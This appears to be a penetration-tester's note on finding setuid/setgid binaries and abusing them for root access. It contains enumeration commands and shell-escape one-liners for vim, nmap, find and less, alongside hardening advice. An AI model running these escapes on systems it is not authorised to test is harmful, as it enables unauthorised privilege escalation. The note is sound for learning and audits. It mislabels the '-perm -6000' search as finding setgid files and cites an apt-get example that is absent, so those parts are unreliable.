7.-Special-permissions

Setuid/Setgid Enumeration

# Find setuid files owned by root
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

# Find setgid files owned by root
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

# Find all setuid files (regardless of owner)
find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null

# Find all setgid files (regardless of owner)
find / -perm -2000 -exec ls -ldb {} \; 2>/dev/null

GTFObins Check (Manual - Check each binary against GTFObins)

Example: If /usr/bin/vim has the setuid bit: Check GTFObins for "vim"

# Example of GTFObins Usage (if vim is setuid and in GTFObins):
vim -c ':!/bin/sh'

# Example of GTFObins Usage (if nmap is setuid and in GTFObins):
nmap --interactive
!sh

# Example of GTFObins Usage (if find is setuid and in GTFObins):
find / -exec /bin/sh -p \; -quit

# Example of GTFObins Usage (if less is setuid and in GTFObins):
less /etc/passwd
!/bin/sh

Understanding setuid and setgid

• setuid (Set User ID):

  • When a file has the setuid bit set, it executes with the effective user ID of the file's owner, not the user who runs it.

  • If the owner is root, the program runs with root privileges.

  • Represented by an "s" in the owner's execute permissions (e.g., -rwsr-xr-x).

  • • Command to find setuid files owned by root:

     find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

• setgid (Set Group ID):

  • Similar to setuid, but it sets the effective group ID to the file's group owner.

  • Useful for giving users temporary access to group-owned resources.

  • Represented by an "s" in the group's execute permissions (e.g. -rwxr-sr-x).

  • Command to find setgid files owned by root:

    find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

Privilege Escalation Potential

• If a setuid binary owned by root has a vulnerability, a regular user can exploit it to gain root privileges.

• Common vulnerabilities include:

  • Buffer overflows.

  • Format string vulnerabilities.

  • Unsafe use of system calls.

  • Path abuse.

• setgid can be used to gain the groups privileges.

GTFOBins: A Crucial Resource

• GTFOBins (gtfobins.github.io) is a curated list of Unix binaries that can be used to bypass security restrictions in misconfigured systems.

• It provides examples of how to:

  • Escape restricted shells.

  • Escalate privileges.

  • Spawn shells.

  • Transfer files.

• The example given, using apt-get, is a very strong example of how GTFObins can be used.

• The key to using GTFObins is to enumerate the binaries that are on a target system, and then to check if those binaries have any exploits within GTFObins.

Important Considerations

• Security Risk: setuid and setgid can be significant security risks if not configured carefully.

• Minimal Privileges: Always follow the principle of least privilege. Only grant the necessary permissions.

• Regular Audits: Regularly audit setuid and setgid files to identify and mitigate potential risks.

• Code Review: If custom setuid or setgid programs are developed, conduct thorough code reviews to ensure they are secure.

• When finding a setuid or setgid binary, always check if it is within GTFObins.

In essence, setuid and setgid are powerful tools that must be used with caution. GTFObins is an essential resource for penetration testers and security professionals to identify and exploit misconfigurations related to these permissions.